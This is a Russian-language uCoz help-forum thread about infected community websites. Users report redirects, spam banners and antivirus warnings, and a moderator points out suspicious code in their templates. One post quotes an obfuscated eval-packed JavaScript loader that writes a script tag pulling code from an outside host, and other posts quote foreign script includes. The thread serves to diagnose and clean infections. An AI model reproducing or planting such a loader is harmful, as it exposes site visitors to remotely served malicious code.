Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
lxxNUTSxxl, тот код, который вы дали, является кодом юкозовского баннера. не показывается в залогиненном виде потому что у вас юнетавторизация, а юнетпользователям баннер не показывается.
а вредоносный код у вас присутствует в форме входа Quote <font color="#a9a9a9"><b>Введите логин:</b></font><br> <font color="#ff0000"> <input name="user" class="login" style="width: 110px;" value="Ваш логин" size="20" type="text"> </font> <br> </b></td><td align="right" valign="top"> выделенное красным удалить!!!! если не разбираетесь в коде, то Code $LOGIN_FORM$ а где вы взяли скрипт формы входа, что у вас сейчас стоит? |
|
прошу умоляю помогите у меня пишет(Найден код порнографической баннерной сети или партнерской программы.
Размещение на сайте порно-рекламы или popUp/popUnder рекламы запрещено. Нарушение правила влечет блокировку сайта.) как мне найти и удалить это!прошу помогите!напишите в isq 209-497-690 |
|
Здравствуйте!!!Я в шоке . Когда захожу на свой сайт как гостьглавная страница открывается вся перекошенная.А когда нажимаю на форум или на что то другое открывает вот это http://milolicasv.ru/profile/.Что мне делать? .Помогите пожалуйста!!!!!!!!!!!!!!!!
 |
|
а зачем вы тут подгружаете фреймами сайт с юкозовским доменом? это все смахивает на дорвей
а теперь по порядку о ваших проблемах Quote Когда захожу на свой сайт как гостьглавная страница открывается вся перекошенная. не используйте дорвейные конструкции и вас никуда уносить не будет. домен к сайту можно прикрутить более гуманным способом. зачем вам вообще подгрузка фреймами? вот ваш исходник Code <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html lang="en"> <head><title>Sweet World</title> <meta name="Keywords" content="Cakes,work with sugar ,Cakes in London,amazing cakes"><meta name="Author" content="Sweet World"><meta name="Description" content="work with sugar ,cakes,cakes in london,amazing cakes"><link rel="shortcut icon" href="http://sweetworld.ucoz.ru/"></head> <frameset rows="100%"> <frame title="http://sweetworld.ucoz.ru/" src="http://sweetworld.ucoz.ru/" name="mainframe" frameborder="0" noresize="noresize" scrolling="auto"> <noframes>Sorry, you don"t appear to have frame support. Go here instead - <a href="http://sweetworld.ucoz.ru/">Sweet World</a></noframes> </frameset> делайте выводы |
|
Primavera, если вашему сайту исполнилось 10 дней, то это значит, что появилась стандартная юкозовская реклама. если вы не узнаете рекламу, то предоставьте скрин окна с рекламой
|
|
Primavera, все нормально у вас. это стандартный юкозовский баннер. его можно оключить или оплатив один из пакетов услуг, или отдельной услугой. а можно и просто оставить. это не вирус
|
|
Кто нибудь может подсказать с недавнего времени сайт перекидывает на другой(на рекламу)
или скачивается файл с расширением .download как это исправить? http://www.gta-island.net.ru/ вот ссылка |
|
Здравствуйте, ко мне недавно поступили жалобы, что мой сайт заражён, но мой антивирусник молчит, я проверял сайт в онлайн-проверке Dr.Web, там также ничего не обнаружилось...помогите выявить вирус (если он есть) и дать инструкцию по его ликвидации...заранее спасибо...
Добавлено (16-Ноя-2010, 16:59:05) |
|
CripZ, у вас такая дикая мусорка из скриптов на сайте, что это просто ужасно.
во-первых: где вы взяли этот шаблон? вставляли ли вы самостоятельно скрипты? во-вторых: понимаете ли вы работу всех скриптов, что у вас вставлены на сайте? пример:
Code </script><script type="text/javascript" src="http://web-masteru.do.am/ws.js"></script> ещё один пример:
Quote <td style="font-size: 10px; padding-left: 10px;" align="left" width="50%"><div class="navig"><a href="Cs-Orp.Net.Ru/" title="Главная">Главная</a> | <a href="" target="_blank" title="Мой профиль">Мой профиль</a> | мало того, что в скрипте кнопки языков у вас целый ворох внешних ссылок плюс подрузка инородного яваскрипта, так ещё и это
Quote <div align="center"><a href="http://gigoo.clan.su/forum/4-74-1" onclick="window.open('http://gigoo.clan.su/forum/4-74-1', '_blank', 'width=600,height=500,top=100,left=100,resizable=1,scrollbars=yes');return(false);" target="_blank"><b><span style="font-size: 7pt;">Получить кнопку|Get button</span></b></a></div> учитывая то, что ваш сайт в поиске на русском языке. приходят к вам русскоговорящие люди. навязывается вопрос: зачем вам эта ужасная кнопка переводов на сотню языков? далее:
Quote <img class="userAvatar" title="Гость" src="http://www.mfilm.at.ua/6eb0c071691c1a61c5dc2d1ce9f8f0d1.png" border="0"> это опять же говорит о том, что подгружать графику с чужих сайтов нехорошо. далее. зачем вы подгружаете библиотеку
Quote <script type="text/javascript" src="/jquery-1.3.2.js"></script> а теперь вопрос на засыпку. как вы считаете, вот этот скрипт за что отвечает и к чему он относится?:
Code <script type='text/javascript' language='javascript'> <!-- eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=\'b://a\'+\'d\'+\'e.o\'+\'9\'+\'g\'+\'8.4/3/?5=6\';7.f("<n"+"0 h"+"q"+"r=\'s"+"u"+"2\' t"+"p=\'t"+"j/i"+"l"+"0\' m"+"c=\'"+1+"\'></k"+"2>");',31,31,'ript|fxe473|ipt|cJdMeBb2473|net|sid|109338|document|chka|kos|vamIIi|http||r1|993|write|he|la|jav|ext|scr|asc|sr|sc||ype|ngua|ge|ja| |vascr'.split('|'),0,{})) // --> первым делом нужно очистить куки и кеш временные файлы интернета. далее стоит подумать о скрипте антимате в миничате. он может подгружать. удалить его и посмотреть реакцию сайта. а дальше очень крепко подумать о том что я тут написала. то есть по всем пунктам |
|
Ситис, блок опрос портала
Quote <div style="font-family:Tahoma,Arial;"> <div style="font-size:8pt;padding-top:2px;text-align:left;"><b>Хотели бы вы видеть в своём городе сталкер-бар?</b></div> <div style="font-size:8pt;text-align:left;"><div class="answer"><input id="a4351" type="radio" name="answer" value="1" style="vertical-align:middle;" /> <label style="vertical-align:middle;display:inline;" for="a4351">Конечно, было бы просто замечательно</label></div> <script type="text/javascript"> то что выделено красным удалить. |
|
webanet, позвольте поинтересоваться, это единственный вирус, который разгуливал по сайту или же они ещё присутствуют, честно говоря, я использовал множество скриптов (тестировал), которые повстречались в интернете, быть может что-то было заражено...
И можно ещё вопрос, как выявить вирус, исключая онлайн-проверку (которая по видимому у меня дала сбой) и антивирусник, который отказывается что-либо обнаружать?) |
|
Ситис, тяжелого мусора конечно же очень много. облако ссылок подгружать с чужого сайта крайне странное занятие. но основу я вам дала. вы её удалили уже.
но вы должны помнить, что подгрузка яваскриптов с чужих сайтов всегда находится в потенциально опасном состоянии
Quote И можно ещё вопрос, как выявить вирус, исключая онлайн-проверку (которая по видимому у меня дала сбой) и антивирусник, который отказывается что-либо обнаружать?) если вы ничего не понимаете в скриптах которые ставите к себе на сайт, то никак. единственное что, так это вы должны бояться ифреймов! |
| |||